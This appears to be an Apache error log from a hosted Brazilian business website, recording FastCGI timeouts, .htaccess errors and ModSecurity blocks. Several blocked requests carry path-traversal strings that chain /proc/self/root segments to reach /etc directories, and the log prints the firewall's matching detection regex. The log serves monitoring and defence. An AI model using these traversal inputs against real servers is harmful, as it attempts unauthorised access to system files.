[Thu Mar 19 01:06:55.141777 2026] [proxy_fcgi:error] [pid 31803:tid 140411599251200] (70007)The timeout specified has expired: [client 179.188.53.243:44764] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 01:07:23.161792 2026] [proxy_fcgi:error] [pid 16140:tid 140411540502272] (70007)The timeout specified has expired: [client 179.188.53.243:45720] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 01:07:31.955462 2026] [:error] [pid 26799:tid 140411716749056] [client 74.7.241.31:37494] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/systemd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abt2g9a6ubjKNq_cu4bq1wAAA0M"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Thu Mar 19 01:07:32.387384 2026] [:error] [pid 14269:tid 140411666392832] [client 74.7.228.61:54546] [client 74.7.228.61] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abt2hAbLMZ6AikZjR9UPcwAAAAk"]
[Thu Mar 19 01:07:50.137787 2026] [proxy_fcgi:error] [pid 30077:tid 140411691570944] (70007)The timeout specified has expired: [client 179.188.53.243:46626] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 01:08:12.373807 2026] [proxy_fcgi:error] [pid 15051:tid 140411649607424] (70007)The timeout specified has expired: [client 179.188.53.243:47214] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 01:08:35.145792 2026] [proxy_fcgi:error] [pid 16140:tid 140411708356352] (70007)The timeout specified has expired: [client 179.188.53.243:47998] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 01:08:57.125858 2026] [proxy_fcgi:error] [pid 31803:tid 140411590858496] (70007)The timeout specified has expired: [client 179.188.53.243:48758] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 01:09:06.733776 2026] [:error] [pid 31803:tid 140411632822016] [client 74.7.243.128:57498] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/chkconfig.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abt24uyqAr6etmhZHNoW2QAAAE0"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Thu Mar 19 01:09:08.434710 2026] [:error] [pid 15826:tid 140411590858496] [client 74.7.243.128:39820] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/init.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abt25OoXxyEfFpUF8f_EMAAAAVI"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Thu Mar 19 01:09:18.146960 2026] [:error] [pid 17887:tid 140411725141760] [client 74.7.241.31:35714] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/cron.monthly"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abt27gkwaGbbGflqUZBi8AAAAMI"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Thu Mar 19 01:09:20.155242 2026] [proxy_fcgi:error] [pid 15826:tid 140411666392832] (70007)The timeout specified has expired: [client 179.188.53.243:49628] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 01:09:20.291193 2026] [:error] [pid 16140:tid 140411708356352] [client 74.7.241.31:43608] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/modules-load.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abt28JYvm7BEsqg4Z-jSogAAAQQ"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Thu Mar 19 01:09:35.125795 2026] [mime_magic:error] [pid 17887:tid 140411582465792] (70014)End of file found: [client 57.141.18.27:56166] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Thu Mar 19 01:09:44.079284 2026] [proxy_fcgi:error] [pid 26799:tid 140411674785536] (70007)The timeout specified has expired: [client 179.188.53.243:50506] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 01:09:53.929900 2026] [:error] [pid 17653:tid 140411666392832] [client 74.7.244.43:42080] [client 74.7.244.43] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "www.bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abt3Ecdf6f5d65gmYZQkBgAAAsk"]
[Thu Mar 19 01:10:07.171273 2026] [proxy_fcgi:error] [pid 16140:tid 140411632822016] (70007)The timeout specified has expired: [client 179.188.53.243:51328] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 01:10:10.670899 2026] [mime_magic:error] [pid 26799:tid 140411658000128] (70014)End of file found: [client 57.141.18.111:56992] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Thu Mar 19 01:10:31.165822 2026] [proxy_fcgi:error] [pid 27293:tid 140411716749056] (70007)The timeout specified has expired: [client 179.188.53.243:52264] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 01:10:53.177818 2026] [proxy_fcgi:error] [pid 26799:tid 140411574073088] (70007)The timeout specified has expired: [client 179.188.53.243:53070] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 01:10:56.054709 2026] [:error] [pid 15826:tid 140411733534464] [client 74.7.243.128:39820] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/dracut.conf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abt3UOoXxyEfFpUF8f_EmwAAAUE"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Thu Mar 19 01:10:59.354984 2026] [:error] [pid 31803:tid 140411616036608] [client 74.7.243.128:54264] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/var/run/initramfs/state/etc/sysconfig"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abt3U-yqAr6etmhZHNoW-AAAAE8"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/var/run/initramfs/state/etc
[Thu Mar 19 01:11:05.798509 2026] [:error] [pid 15051:tid 140411699963648] [client 74.7.243.128:40414] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/xinetd.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abt3WSmAPhZkrhU8w4m5pgAAAIU"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Thu Mar 19 01:11:19.137421 2026] [proxy_fcgi:error] [pid 31803:tid 140411658000128] (70007)The timeout specified has expired: [client 179.188.53.243:54030] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 01:11:43.945781 2026] [:error] [pid 16140:tid 140411658000128] [client 74.7.243.128:47414] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/uwsgi.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abt3f5Yvm7BEsqg4Z-jS5wAAAQo"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Thu Mar 19 01:11:47.196748 2026] [core:alert] [pid 17887:tid 140411733534464] [client 57.141.18.108:59756] /home/storage/0/fc/16/bandeirantesbomb3/public_html/.htaccess: </FilesMatch> without matching <FilesMatch> section
[Thu Mar 19 01:11:48.157826 2026] [proxy_fcgi:error] [pid 16140:tid 140411691570944] (70007)The timeout specified has expired: [client 179.188.53.243:55172] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 01:12:14.698780 2026] [proxy_fcgi:error] [pid 26799:tid 140411565680384] (70007)The timeout specified has expired: [client 179.188.53.243:56162] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 01:12:36.507689 2026] [:error] [pid 14269:tid 140411590858496] [client 74.7.228.61:50728] [client 74.7.228.61] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abt3tAbLMZ6AikZjR9UP6QAAABI"]
[Thu Mar 19 01:12:39.433530 2026] [mime_magic:error] [pid 14269:tid 140411683178240] (70014)End of file found: [client 57.141.18.75:60812] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Thu Mar 19 01:12:55.147078 2026] [proxy_fcgi:error] [pid 16140:tid 140411540502272] (70007)The timeout specified has expired: [client 179.188.53.243:57790] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 01:13:33.121930 2026] [proxy_fcgi:error] [pid 15051:tid 140411582465792] (70007)The timeout specified has expired: [client 179.188.53.243:59084] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 01:13:55.125850 2026] [proxy_fcgi:error] [pid 26799:tid 140411582465792] (70007)The timeout specified has expired: [client 179.188.53.243:59770] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 01:14:17.125782 2026] [proxy_fcgi:error] [pid 27293:tid 140411582465792] (70007)The timeout specified has expired: [client 179.188.53.243:60420] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 01:14:39.125807 2026] [proxy_fcgi:error] [pid 14269:tid 140411699963648] (70007)The timeout specified has expired: [client 179.188.53.243:32918] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 01:14:54.166250 2026] [:error] [pid 15826:tid 140411733534464] [client 74.7.244.43:47716] [client 74.7.244.43] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "www.bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abt4PuoXxyEfFpUF8f_E6wAAAUE"]
[Thu Mar 19 01:14:57.121079 2026] [core:alert] [pid 14269:tid 140411616036608] [client 57.141.18.35:35672] /home/storage/0/fc/16/bandeirantesbomb3/public_html/.htaccess: </FilesMatch> without matching <FilesMatch> section
[Thu Mar 19 01:15:06.189831 2026] [proxy_fcgi:error] [pid 26799:tid 140411741927168] (70007)The timeout specified has expired: [client 179.188.53.243:33610] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 01:15:30.125926 2026] [proxy_fcgi:error] [pid 27403:tid 140411641214720] (70007)The timeout specified has expired: [client 179.188.53.243:34232] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 01:15:52.125831 2026] [proxy_fcgi:error] [pid 15826:tid 140411658000128] (70007)The timeout specified has expired: [client 179.188.53.243:34864] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 01:15:53.598217 2026] [:error] [pid 17653:tid 140411607643904] [client 74.7.243.128:51472] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/selinux"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abt4ecdf6f5d65gmYZQktwAAAtA"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Thu Mar 19 01:16:06.147059 2026] [mime_magic:error] [pid 27293:tid 140411548894976] (70014)End of file found: [client 57.141.18.37:37662] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Thu Mar 19 01:16:07.030210 2026] [mime_magic:error] [pid 26799:tid 140411574073088] (70014)End of file found: [client 57.141.18.22:37582] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Thu Mar 19 01:16:14.125854 2026] [proxy_fcgi:error] [pid 17887:tid 140411658000128] (70007)The timeout specified has expired: [client 179.188.53.243:35532] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 01:16:20.571432 2026] [:error] [pid 30077:tid 140411582465792] [client 74.7.243.128:46160] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/rwtab.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abt4lPu8EFLIOrSqIptOEwAAAlM"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Thu Mar 19 01:16:36.073839 2026] [proxy_fcgi:error] [pid 19093:tid 140411548894976] (70007)The timeout specified has expired: [client 179.188.53.243:36052] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 01:16:57.124601 2026] [proxy_fcgi:error] [pid 31803:tid 140411582465792] (70007)The timeout specified has expired: [client 179.188.53.243:36690] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 01:17:04.478229 2026] [:error] [pid 26799:tid 140411548894976] [client 74.7.241.31:56902] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/rwtab.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abt4wNa6ubjKNq_cu4bsTQAAA1c"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Thu Mar 19 01:17:18.066600 2026] [mime_magic:error] [pid 27403:tid 140411557287680] (70014)End of file found: [client 57.141.18.98:39000] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Thu Mar 19 01:17:20.133796 2026] [proxy_fcgi:error] [pid 15826:tid 140411683178240] (70007)The timeout specified has expired: [client 179.188.53.243:37292] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 01:17:39.475620 2026] [core:alert] [pid 31803:tid 140411725141760] [client 74.7.241.31:51150] /home/storage/0/fc/16/bandeirantesbomb3/public_html/.htaccess: </FilesMatch> without matching <FilesMatch> section, referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/usr/libexec
[Thu Mar 19 01:17:43.045828 2026] [proxy_fcgi:error] [pid 27403:tid 140411574073088] (70007)The timeout specified has expired: [client 179.188.53.243:37832] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 01:18:09.065838 2026] [proxy_fcgi:error] [pid 27293:tid 140411599251200] (70007)The timeout specified has expired: [client 179.188.53.243:38646] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 01:18:39.129873 2026] [proxy_fcgi:error] [pid 16140:tid 140411658000128] (70007)The timeout specified has expired: [client 179.188.53.243:39546] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 01:18:55.785176 2026] [:error] [pid 15826:tid 140411699963648] [client 74.7.243.128:50406] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/selinux"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abt5L-oXxyEfFpUF8f_FeQAAAUU"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Thu Mar 19 01:19:11.129842 2026] [proxy_fcgi:error] [pid 27293:tid 140411683178240] (70007)The timeout specified has expired: [client 179.188.53.243:40134] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 01:19:44.071037 2026] [proxy_fcgi:error] [pid 27293:tid 140411641214720] (70007)The timeout specified has expired: [client 179.188.53.243:40884] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 01:19:53.601419 2026] [mime_magic:error] [pid 15826:tid 140411590858496] (70014)End of file found: [client 57.141.18.120:42142] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Thu Mar 19 01:20:02.666443 2026] [core:alert] [pid 15826:tid 140411565680384] [client 57.141.18.111:42364] /home/storage/0/fc/16/bandeirantesbomb3/public_html/.htaccess: </FilesMatch> without matching <FilesMatch> section
[Thu Mar 19 01:20:12.183011 2026] [proxy_fcgi:error] [pid 17887:tid 140411725141760] (70007)The timeout specified has expired: [client 179.188.53.243:41470] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 01:20:34.135579 2026] [proxy_fcgi:error] [pid 30077:tid 140411574073088] (70007)The timeout specified has expired: [client 179.188.53.243:41884] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 01:20:57.289838 2026] [proxy_fcgi:error] [pid 27403:tid 140411599251200] (70007)The timeout specified has expired: [client 179.188.53.243:42352] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 01:21:21.134004 2026] [proxy_fcgi:error] [pid 31803:tid 140411574073088] (70007)The timeout specified has expired: [client 179.188.53.243:42860] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 01:21:25.501409 2026] [mime_magic:error] [pid 14269:tid 140411725141760] (70014)End of file found: [client 57.141.18.12:43982] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
